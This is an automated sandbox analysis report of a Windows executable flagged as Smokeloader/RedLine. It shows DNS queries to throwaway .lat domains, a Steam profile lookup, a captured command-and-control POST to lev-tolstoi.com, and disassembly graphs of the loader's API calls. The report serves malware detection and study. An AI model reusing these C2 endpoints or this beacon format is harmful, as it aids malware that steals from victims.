Dec 23, 2024 07:01:22.221484900 CET | 49722 | 443 | 192.168.2.9 | 23.55.153.106
Dec 23, 2024 07:01:22.221494913 CET | 443 | 49722 | 23.55.153.106 | 192.168.2.9
Dec 23, 2024 07:01:22.221549034 CET | 49722 | 443 | 192.168.2.9 | 23.55.153.106
Dec 23, 2024 07:01:22.221606016 CET | 443 | 49722 | 23.55.153.106 | 192.168.2.9
Dec 23, 2024 07:01:22.221678019 CET | 49722 | 443 | 192.168.2.9 | 23.55.153.106
Dec 23, 2024 07:01:22.224447966 CET | 49722 | 443 | 192.168.2.9 | 23.55.153.106
Dec 23, 2024 07:01:22.224462032 CET | 443 | 49722 | 23.55.153.106 | 192.168.2.9
Dec 23, 2024 07:01:22.367716074 CET | 49733 | 443 | 192.168.2.9 | 172.67.157.254
Dec 23, 2024 07:01:22.367758989 CET | 443 | 49733 | 172.67.157.254 | 192.168.2.9
Dec 23, 2024 07:01:22.367875099 CET | 49733 | 443 | 192.168.2.9 | 172.67.157.254
Dec 23, 2024 07:01:22.368336916 CET | 49733 | 443 | 192.168.2.9 | 172.67.157.254
Dec 23, 2024 07:01:22.368359089 CET | 443 | 49733 | 172.67.157.254 | 192.168.2.9
Dec 23, 2024 07:01:23.588576078 CET | 443 | 49733 | 172.67.157.254 | 192.168.2.9
Dec 23, 2024 07:01:23.588701963 CET | 49733 | 443 | 192.168.2.9 | 172.67.157.254
Dec 23, 2024 07:01:23.593841076 CET | 49733 | 443 | 192.168.2.9 | 172.67.157.254
Dec 23, 2024 07:01:23.593856096 CET | 443 | 49733 | 172.67.157.254 | 192.168.2.9
Dec 23, 2024 07:01:23.594280958 CET | 443 | 49733 | 172.67.157.254 | 192.168.2.9
Dec 23, 2024 07:01:23.634833097 CET | 49733 | 443 | 192.168.2.9 | 172.67.157.254
Dec 23, 2024 07:01:23.659159899 CET | 49733 | 443 | 192.168.2.9 | 172.67.157.254
Dec 23, 2024 07:01:23.659183979 CET | 49733 | 443 | 192.168.2.9 | 172.67.157.254
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:23.659323931 CET44349733172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:24.615436077 CET44349733172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:24.615540981 CET44349733172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:24.615832090 CET49733443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:24.615832090 CET49733443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:24.615832090 CET49733443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:24.671418905 CET49739443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:24.671456099 CET44349739172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:24.671529055 CET49739443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:24.672038078 CET49739443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:24.672050953 CET44349739172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:24.926337957 CET49733443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:24.926373959 CET44349733172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:25.426774979 CET49739443192.168.2.9172.67.157.254
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 23, 2024 07:01:17.451107025 CET | 57293 | 53 | 192.168.2.9 | 1.1.1.1 |
| Dec 23, 2024 07:01:17.588783026 CET | 53 | 57293 | 1.1.1.1 | 192.168.2.9 |
| Dec 23, 2024 07:01:17.593871117 CET | 49807 | 53 | 192.168.2.9 | 1.1.1.1 |
| Dec 23, 2024 07:01:17.731132984 CET | 53 | 49807 | 1.1.1.1 | 192.168.2.9 |
| Dec 23, 2024 07:01:17.733544111 CET | 62547 | 53 | 192.168.2.9 | 1.1.1.1 |
| Dec 23, 2024 07:01:17.872001886 CET | 53 | 62547 | 1.1.1.1 | 192.168.2.9 |
| Dec 23, 2024 07:01:17.878638983 CET | 54275 | 53 | 192.168.2.9 | 1.1.1.1 |
| Dec 23, 2024 07:01:18.016024113 CET | 53 | 54275 | 1.1.1.1 | 192.168.2.9 |
| Dec 23, 2024 07:01:18.312819958 CET | 57145 | 53 | 192.168.2.9 | 1.1.1.1 |
| Dec 23, 2024 07:01:18.703264952 CET | 53 | 57145 | 1.1.1.1 | 192.168.2.9 |
| Dec 23, 2024 07:01:18.706968069 CET | 55219 | 53 | 192.168.2.9 | 1.1.1.1 |
| Dec 23, 2024 07:01:18.852054119 CET | 53 | 55219 | 1.1.1.1 | 192.168.2.9 |
| Dec 23, 2024 07:01:18.854285002 CET | 63913 | 53 | 192.168.2.9 | 1.1.1.1 |
| Dec 23, 2024 07:01:18.990926027 CET | 53 | 63913 | 1.1.1.1 | 192.168.2.9 |
| Dec 23, 2024 07:01:18.994328976 CET | 62535 | 53 | 192.168.2.9 | 1.1.1.1 |
| Dec 23, 2024 07:01:19.132860899 CET | 53 | 62535 | 1.1.1.1 | 192.168.2.9 |
| Dec 23, 2024 07:01:19.136590004 CET | 63618 | 53 | 192.168.2.9 | 1.1.1.1 |
| Dec 23, 2024 07:01:19.274616957 CET | 53 | 63618 | 1.1.1.1 | 192.168.2.9 |
| Dec 23, 2024 07:01:19.278156996 CET | 64163 | 53 | 192.168.2.9 | 1.1.1.1 |
| Dec 23, 2024 07:01:19.501619101 CET | 53 | 64163 | 1.1.1.1 | 192.168.2.9 |
| Dec 23, 2024 07:01:22.228873968 CET | 61239 | 53 | 192.168.2.9 | 1.1.1.1 |
| Dec 23, 2024 07:01:22.366327047 CET | 53 | 61239 | 1.1.1.1 | 192.168.2.9 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 23, 2024 07:01:17.451107025 CET | 192.168.2.9 | 1.1.1.1 | 0xad5b | Standard query (0) | sweepyribs.lat | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 07:01:17.593871117 CET | 192.168.2.9 | 1.1.1.1 | 0x340d | Standard query (0) | grannyejh.lat | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 07:01:17.733544111 CET | 192.168.2.9 | 1.1.1.1 | 0x787a | Standard query (0) | discokeyus.lat | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 07:01:17.878638983 CET | 192.168.2.9 | 1.1.1.1 | 0x7c91 | Standard query (0) | necklacebudi.lat | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 07:01:18.312819958 CET | 192.168.2.9 | 1.1.1.1 | 0xdf6b | Standard query (0) | energyaffai.lat | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 07:01:18.706968069 CET | 192.168.2.9 | 1.1.1.1 | 0xfc80 | Standard query (0) | aspecteirs.lat | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 07:01:18.854285002 CET | 192.168.2.9 | 1.1.1.1 | 0xbabc | Standard query (0) | sustainskelet.lat | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 07:01:18.994328976 CET | 192.168.2.9 | 1.1.1.1 | 0x1b4d | Standard query (0) | crosshuaht.lat | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 07:01:19.136590004 CET | 192.168.2.9 | 1.1.1.1 | 0xec3a | Standard query (0) | rapeflowwj.lat | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 07:01:19.278156996 CET | 192.168.2.9 | 1.1.1.1 | 0xd957 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 07:01:22.228873968 CET | 192.168.2.9 | 1.1.1.1 | 0x44c1 | Standard query (0) | lev-tolstoi.com | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Dec 23, 2024 07:01:17.588783026 CET | 1.1.1.1 | 192.168.2.9 | 0xad5b | Name error (3) | sweepyribs.lat | none | none | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 07:01:17.731132984 CET | 1.1.1.1 | 192.168.2.9 | 0x340d | Name error (3) | grannyejh.lat | none | none | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 07:01:17.872001886 CET | 1.1.1.1 | 192.168.2.9 | 0x787a | Name error (3) | discokeyus.lat | none | none | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 07:01:18.016024113 CET | 1.1.1.1 | 192.168.2.9 | 0x7c91 | Name error (3) | necklacebudi.lat | none | none | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 07:01:18.703264952 CET | 1.1.1.1 | 192.168.2.9 | 0xdf6b | Name error (3) | energyaffai.lat | none | none | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 07:01:18.852054119 CET | 1.1.1.1 | 192.168.2.9 | 0xfc80 | Name error (3) | aspecteirs.lat | none | none | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 07:01:18.990926027 CET | 1.1.1.1 | 192.168.2.9 | 0xbabc | Name error (3) | sustainskelet.lat | none | none | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 07:01:19.132860899 CET | 1.1.1.1 | 192.168.2.9 | 0x1b4d | Name error (3) | crosshuaht.lat | none | none | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 07:01:19.274616957 CET | 1.1.1.1 | 192.168.2.9 | 0xec3a | Name error (3) | rapeflowwj.lat | none | none | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 07:01:19.501619101 CET | 1.1.1.1 | 192.168.2.9 | 0xd957 | No error (0) | steamcommunity.com | | 23.55.153.106 | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 07:01:22.366327047 CET | 1.1.1.1 | 192.168.2.9 | 0x44c1 | No error (0) | lev-tolstoi.com | | 172.67.157.254 | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 07:01:22.366327047 CET | 1.1.1.1 | 192.168.2.9 | 0x44c1 | No error (0) | lev-tolstoi.com | | 104.21.66.86 | A (IP address) | IN (0x0001) | false |
• steamcommunity.com
• lev-tolstoi.com
                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      0192.168.2.94972223.55.153.1064433440C:\Users\user\Desktop\NQbg5Ht2hW.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-23 06:01:21 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                                                                                                                                      2024-12-23 06:01:22 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 06:01:21 GMT
                                                                                                                                                                                                                                                                      Content-Length: 35121
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Set-Cookie: sessionid=ea8140059e74463eb3aab1fd; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49733 | 172.67.157.254 | 443 | 3440 | C:\Users\user\Desktop\NQbg5Ht2hW.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:01:23 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: lev-tolstoi.com
2024-12-23 06:01:23 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-23 06:01:24 UTC | 1134 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 06:01:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=mauloucni696l0jhth8p97aado; expires=Thu, 17 Apr 2025 23:48:03 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BoTS%2BuExDYFH6bGNQBTWoV8p8dZE9UsC1%2FB2VsLCFJsd4CMaKCgk5f4SaW%2Bv%2BSdJHABo88mgfW4JqUd6NPtFyQXENJpoi%2Fzdw74SXoou55ADR0DJOj%2Ft%2BoMxTmazaD7sX8U%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6623042eb55e7a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1674&min_rtt=1669&rtt_var=637&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1704611&cwnd=214&unsent_bytes=0&cid=6fbd91eca8ff24e0&ts=1040&x=0"
2024-12-23 06:01:24 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-23 06:01:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0



Target ID: 0
Start time: 01:01:15
Start date: 23/12/2024
Path: C:\Users\user\Desktop\NQbg5Ht2hW.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\NQbg5Ht2hW.exe"
Imagebase: 0x400000
File size: 296'448 bytes
MD5 hash: D1137063CCA03F3D3079C8C4DB839B95
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1716537575.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: true

Target ID: 4
Start time: 01:01:24
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 660
Imagebase: 0x2e0000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 1.5%
Dynamic/Decrypted Code Coverage: 34.1%
Signature Coverage: 36.5%
Total number of Nodes: 85
Total number of Limit Nodes: 7

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: &K M$&wXy$'sZu$/O_q$Jk"m$e7o9$h? !
• API String ID: 0-2986092683
• Opcode ID: 78924bc98445a2391149b9471296c65ab5c3f104a6a24834f995a4e0cdf96e1e
• Instruction ID: 590b8efa2b06f5e02b6b835ab0c7a13339e1eb4ce69d4453d365afcab8c45654
• Opcode Fuzzy Hash: 78924bc98445a2391149b9471296c65ab5c3f104a6a24834f995a4e0cdf96e1e
• Instruction Fuzzy Hash: D80286B5200B01DFD324CF25D891B97BBF1FB49705F108A2CE5AA8BAA0D775A845CF85

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 149 408850-408861 call 43bc60 152 408867-40888f call 408020 149->152 153 408acf-408ad1 ExitProcess 149->153 156 408890-4088cb 152->156 157 408904-408916 call 4354e0 156->157 158 4088cd-408902 156->158 161 408ab8-408abf 157->161 162 40891c-40893f GetCurrentProcessId GetCurrentThreadId 157->162 158->156 163 408ac1-408ac7 call 408030 161->163 164 408aca call 43c160 161->164 165 408941-408943 162->165 166 408945-408a3b SHGetSpecialFolderPathW GetForegroundWindow 162->166 163->164 164->153 165->166 169 408a6b-408aac call 409b00 166->169 170 408a3d-408a69 166->170 169->161 174 408aae call 40c550 169->174 170->169 176 408ab3 call 40b390 174->176 176->161
APIs
• GetCurrentProcessId.KERNEL32 ref: 0040891C
• GetCurrentThreadId.KERNEL32 ref: 00408925
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089DB
• GetForegroundWindow.USER32 ref: 00408A33
  • Part of subcall function 0040C550: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
  • Part of subcall function 0040B390: FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
  • Part of subcall function 0040B390: FreeLibrary.KERNEL32 ref: 0040B3B7
• ExitProcess.KERNEL32 ref: 00408AD1
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
• String ID:
• API String ID: 3072701918-0
• Opcode ID: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
• Instruction ID: 4e8ceca9db94e69365d2c2d7f1aefafb9de861df3649afd20bfce81a3928f3be
• Opcode Fuzzy Hash: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
• Instruction Fuzzy Hash: 9351A9BBF102180BD71CAEAACD463A675878BC5710F1F813E5985EB7D6EDB88C0142C9

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 189 4707a6-4707bf 190 4707c1-4707c3 189->190 191 4707c5 190->191 192 4707ca-4707d6 CreateToolhelp32Snapshot 190->192 191->192 193 4707e6-4707f3 Module32First 192->193 194 4707d8-4707de 192->194 195 4707f5-4707f6 call 470465 193->195 196 4707fc-470804 193->196 194->193 199 4707e0-4707e4 194->199 200 4707fb 195->200 199->190 199->193 200->196
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 004707CE
• Module32First.KERNEL32(00000000,00000224), ref: 004707EE
Memory Dump Source
• Source File: 00000000.00000002.1716537575.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_470000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0
• Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction ID: 5595ceff43f7b3773f2b5f76221f31d5ab95906f67ec572e80d6a2261ca759b8
• Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction Fuzzy Hash: B6F0C231102310ABD7203AB5988CAAFB7ECAF49725F10852AE64A911C0DA78F8054A64

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 214 43c1f0-43c222 LdrInitializeThunk
APIs
• LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
• Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
• Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
• Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: ,+*)
• API String ID: 0-3529585375
• Opcode ID: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
• Instruction ID: 95b520c28a51d7a8debe208fb8c6725e065a55489a7142fefcc330b3f2274472
• Opcode Fuzzy Hash: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
• Instruction Fuzzy Hash: 7331A539B402119BEB18CF58CCD1BBEB7B2BB49301F249129D501B7390CB75AD018B58
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: o`
• API String ID: 0-3993896143
                                                                                                                                                                                                                                                                        • Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                                                                                                                                                                                                                                                        • Instruction ID: 0bdba0f6bf2b5cd18ae264ba298f37260da84434396a298b3053f459174327b1
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9C11C270218340AFC310DF65DDC1B6BBFE2DBC2204F65983DE185A72A1C675E9499719

Control-flow Graph

control_flow_graph 0 71003c-710047 1 710049 0->1 2 71004c-710263 call 710a3f call 710e0f call 710d90 VirtualAlloc 0->2 1->2 17 710265-710289 call 710a69 2->17 18 71028b-710292 2->18 23 7102ce-7103c2 VirtualProtect call 710cce call 710ce7 17->23 20 7102a1-7102b0 18->20 22 7102b2-7102cc 20->22 20->23 22->20 29 7103d1-7103e0 23->29 30 7103e2-710437 call 710ce7 29->30 31 710439-7104b8 VirtualFree 29->31 30->29 33 7105f4-7105fe 31->33 34 7104be-7104cd 31->34 37 710604-71060d 33->37 38 71077f-710789 33->38 36 7104d3-7104dd 34->36 36->33 42 7104e3-710505 LoadLibraryA 36->42 37->38 43 710613-710637 37->43 40 7107a6-7107b0 38->40 41 71078b-7107a3 38->41 44 7107b6-7107cb 40->44 45 71086e-7108be LoadLibraryA 40->45 41->40 46 710517-710520 42->46 47 710507-710515 42->47 48 71063e-710648 43->48 49 7107d2-7107d5 44->49 52 7108c7-7108f9 45->52 50 710526-710547 46->50 47->50 48->38 51 71064e-71065a 48->51 53 710824-710833 49->53 54 7107d7-7107e0 49->54 55 71054d-710550 50->55 51->38 56 710660-71066a 51->56 57 710902-71091d 52->57 58 7108fb-710901 52->58 64 710839-71083c 53->64 59 7107e2 54->59 60 7107e4-710822 54->60 61 7105e0-7105ef 55->61 62 710556-71056b 55->62 63 71067a-710689 56->63 58->57 59->53 60->49 61->36 65 71056d 62->65 66 71056f-71057a 62->66 67 710750-71077a 63->67 68 71068f-7106b2 63->68 64->45 69 71083e-710847 64->69 65->61 71 71059b-7105bb 66->71 72 71057c-710599 66->72 67->48 73 7106b4-7106ed 68->73 74 7106ef-7106fc 68->74 75 710849 69->75 76 71084b-71086c 69->76 83 7105bd-7105db 71->83 72->83 73->74 77 71074b 74->77 78 7106fe-710748 74->78 75->45 76->64 77->63 78->77 83->55
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0071024D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction ID: dddb954d4c91f8c1d024fd704acbca7c65cfc46efce7c1d5c5ba78576aae2c30
• Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction Fuzzy Hash: 2D527974A00229DFDB64CF58C984BA8BBB1BF09304F1480D9E94DAB291DB74AED4DF54

Control-flow Graph

control_flow_graph 202 710e0f-710e24 SetErrorMode * 2 203 710e26 202->203 204 710e2b-710e2c 202->204 203->204
APIs
• SetErrorMode.KERNELBASE(00000400,?,?,00710223,?,?), ref: 00710E19
• SetErrorMode.KERNELBASE(00000000,?,?,00710223,?,?), ref: 00710E1E
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction ID: dd936021994f715312386500ef353d09b2d1401ac4667c0c5e3c6ca7852f469a
• Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction Fuzzy Hash: F4D0123114512877DB003A95DC09BCD7B1CDF05B62F008411FB0DD9080C7B4998046E5

Control-flow Graph

control_flow_graph 205 40e71a-40e738 CoUninitialize * 2
APIs
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID: Uninitialize
• String ID:
• API String ID: 3861434553-0
• Opcode ID: bd4e50c2cf2632c146e6dc99e67d996af78d75fcb2eac0acec7d90a27868b704
• Instruction ID: 47d587ad0eb400b5f6ee0cc7c77a8a39c50d7b10eba8d8677ba26603a35f3bb5
• Opcode Fuzzy Hash: bd4e50c2cf2632c146e6dc99e67d996af78d75fcb2eac0acec7d90a27868b704
• Instruction Fuzzy Hash: 10C04CFDA85141EFD384CF24EC5A4157725AB866873000535F913C2370CA6065818A0C

Control-flow Graph

control_flow_graph 206 43c2c8-43c2d6 207 43c2e0-43c2fd 206->207 207->207 208 43c2ff-43ccb9 GetForegroundWindow call 43e110 207->208 211 43ccbe-43ccdf 208->211
APIs
• GetForegroundWindow.USER32 ref: 0043CCAF
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
